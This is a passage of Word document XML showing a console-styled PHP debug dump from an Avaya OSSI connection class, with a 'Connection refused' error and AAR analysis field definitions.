              <w:t>set_state</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(array(</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23FC73C2" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_host</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26F199EB" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_port</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DAA87F1" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="322DEB8A" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_socket</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; false,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26B1CF72" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_nErr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 111,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E7018BE" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_strErr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'Connection refused',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D71D9B5" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_timeoutSeconds</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 10,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13B9E6CC" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_ossi_response_timeout</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '10',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DD7E544" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_lastError</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E8354A5" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_bManualLoginRequired</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; false,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F5309D8" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_nRefCount</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 0,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FAD7D62" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_bTiming</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; false,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DAFF13D" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_nMaxPorts</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 5,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61C6ACCA" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    )),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DDFB680" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    'type' =&gt; '-&gt;',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A68FC4E" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>args</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18A411D5" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    array (</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="694CD585" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">      0 =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43A8318C" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">      array (</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2681A6B8" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        'Host' =&gt; 'localhost',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56E5B909" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        'Port' =&gt; '4101',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45F86017" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        'Login' =&gt; '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>avaya</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="648B39AE" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        'Credentials' =&gt; '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>avaya</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C30B48F" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        'Writable' =&gt; false,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="038B9E74" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">      ),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E4A8D14" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    ),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D12EFF0" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  ),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A8BA274" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  4 =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69E414EE" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  array (</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E03D1AA"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include/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>OSSIModel.class.php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="238F537B" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    'line' =&gt; 78,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C825EBD" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    'function' =&gt; '_</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>openConnection</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40795652" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    'class' =&gt; '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>OSSIModel</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09F16394" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    'object' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C85EBCD" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>AARAnalysisModel</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>::</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>__</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>set_state</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(array(</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08B3D272" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_connectionOpen</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; false,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="759D1103" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_objname</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>aar</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> analysis',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25A2A9BC" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_lastError</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C565EB2" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">       '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="487BC4DB" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">      array (</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F3BD881" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Dialed_String</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45EDA9A0"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49913405" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '807fff',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="628575F0" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_isnumeric</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 0,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="350A5506" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_cardinality</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="686CA30A" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 18,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AB7AB00" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_label</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'Dialed String',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6327D5D8" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_keywords</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A43BE2D" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          array (</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63E37DBE" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">            0 =&gt; 'Digits to be analyzed',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="295BC11C" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">            1 =&gt; '',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="400C15E8" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          ),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AB12ABE" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69C17D1C" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_array_pos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3EE97CF4" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        )),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E6B780E" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Total_min</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BE97BA4"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7391226" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '8080ff',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="137A3843" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_isnumeric</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 0,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52CD30DD" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_cardinality</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24D875EA" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 2,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F304D81" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_label</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'Total min',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B1A09E2" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_keywords</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50F9E989" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E80FCB8" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_array_pos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="556BF16A" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        )),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29194FCB" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Total_max</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B16E1E2"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47E46B59" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
